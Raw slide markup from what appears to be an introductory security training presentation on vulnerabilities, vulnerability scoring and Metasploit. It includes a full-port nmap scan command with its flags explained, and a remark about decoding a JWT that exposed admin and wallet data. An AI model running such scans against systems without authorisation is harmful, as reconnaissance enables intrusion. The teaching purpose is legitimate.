            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793661" y="2599509"/>
            <a:ext cx="4530898" cy="3639450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I tried to see what the token hold in it, so I decrypted it by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jwt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>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As shown in the figure above, it holds data about an admin and his wallet id.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37EF2524-357D-5470-8638-594323D087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24559" y="2599509"/>
            <a:ext cx="6058803" cy="3496491"/>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19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B54A2FF-477E-D779-42E9-DE7A858673B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7B4D16-7225-015C-4645-9CC6C207464F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="548640"/>
            <a:ext cx="10168128" cy="1179576"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>What are Vulnerabilities?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 1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group of people in black masks&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B5748AD-2ABB-ABBC-2599-BF2058689E44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="4847" r="5192" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="908304" y="2478024"/>
            <a:ext cx="6009855" cy="3694176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85F2CE15-11D5-C348-7F43-294BA356778E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7411453" y="2478024"/>
            <a:ext cx="3872243" cy="3694176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Malak Osama</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51896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6254FF-D564-52E6-2F5B-2C1CF1680F7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D8233B0-41B5-4D9A-AEEC-13DB66A8C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0EFE5C-5066-1B46-1FC9-1890B8516261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="808637" y="386930"/>
            <a:ext cx="10208407" cy="1188950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Importance of Understanding Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">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2" name="Rectangle 11">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BAADC00-048D-F4FB-B482-4DA3518A2C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3683599764"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="825264" y="2598710"/>
          <a:ext cx="10039472" cy="34381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346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9EC84C-A9FB-87AA-118B-1B03D71AEE25}"/>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A4D3B3-AC76-37A6-EC9E-E5529BB1AC99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621792" y="1161288"/>
            <a:ext cx="3602736" cy="4526280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Vulnerability Categories</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1A7DA64-58A3-7EF2-E973-EACA8B32E326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4059803530"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5303520" y="676656"/>
          <a:ext cx="6364224" cy="55138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19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8FDB9C-D3DE-8D5C-620B-C78263781743}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A close-up of a white surface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90994DA4-E76C-B820-DD12-6207EBD904FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:duotone>
              <a:schemeClr val="bg2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:srcRect t="15568" r="9091" b="7535"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191980" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25">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DA6345-AAE9-3CC9-6A35-BC5BC7BD2465}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Vulnerability Scoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{325FA064-63B6-9E2B-F56B-93FB487EB949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="436801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560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21"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3A9C5-5330-020F-E013-F28D3B67C8D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1641752"/>
            <a:ext cx="4391024" cy="1323439"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Introduction to Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8959183-25E1-2F5D-7673-195A3F01C1AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4925962"/>
            <a:ext cx="4391024" cy="1082726"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Malak Osama</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A logo with a shield and a letter n&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F365D8AB-3546-C468-B710-33E63F41A9CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="39298" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>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effectLst>
            <a:outerShdw blurRad="381000" dist="152400" dir="5400000" algn="t" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="10000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">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3" name="Freeform: Shape 12">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69442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166D1-FAED-040F-2A1F-4F6DF45BC930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Introduction to Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{553AADA4-1C51-AA86-E6FB-0C699BB0B5C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A logo with a shield and a letter n&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB32EC3D-2FB3-5675-519D-D86169E786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5113" y="263525"/>
            <a:ext cx="4048126" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7338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C7F2405-8E94-8BF9-CF33-CCA5292BC8F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3802295-7006-0B1E-F1B2-3609B3210E18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="673770"/>
            <a:ext cx="3220329" cy="2027227"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key Concepts in Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D18BFE42-6857-AECC-0926-B0B33A50D9D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="993423441"/>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178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9269C8-BCAE-85C5-1892-420A6F60C9E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="967853" y="5013474"/>
            <a:ext cx="10640754" cy="775845"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mina Ghattas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="Group 41">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2" y="170309"/>
            <a:ext cx="2514948" cy="2174333"/>
            <a:chOff x="-305" y="-4155"/>
            <a:chExt cx="2514948" cy="2174333"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Freeform: Shape 42">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6" name="Freeform: Shape 45">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Picture 6" descr="A logo with blue text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FE104F-CE77-F87C-7988-22F5D8D03B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48" y="571145"/>
            <a:ext cx="10555905" cy="3333443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="Group 47">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4" y="4560733"/>
            <a:ext cx="3061445" cy="2297266"/>
            <a:chOff x="-305" y="-1"/>
            <a:chExt cx="3832880" cy="2876136"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Freeform: Shape 48">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Freeform: Shape 50">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28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3AF8E89-894F-04FA-9B30-0EE214FF3F96}"/>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0C240-D1A2-DC95-C936-2FE9BA61AA02}"/>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Metasploit Basics &amp; Scanning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EEDDDCA-6CDB-CFCB-8AC3-73719D6DD5A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4447308" y="591344"/>
            <a:ext cx="6906491" cy="5585619"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Metasploit Overview</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Exploitation framework with two versions: Metasploit Pro (GUI) and Metasploit Framework (open-source, CLI).</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Used for scanning, exploiting vulnerabilities, and post-exploitation tasks.</a:t>
            </a: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Scanning with Nmap</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Nmap Command Breakdown:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="1"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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> -p- -T4 --min-rate=9326 -</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> [MACHINE IP]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="2"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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </a:rPr>
              <a:t>: Run target scripts.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="2"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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </a:rPr>
              <a:t>: Detect versions.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="2"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Unicode MS"/>
              </a:rPr>
              <a:t>-p-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </a:rPr>
              <a:t>: Scan all ports.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="2"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Unicode MS"/>
              </a:rPr>
              <a:t>T4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </a:rPr>
              <a:t>: Speed up scan.</a:t>
            </a:r>
          </a:p>
          <a:p>
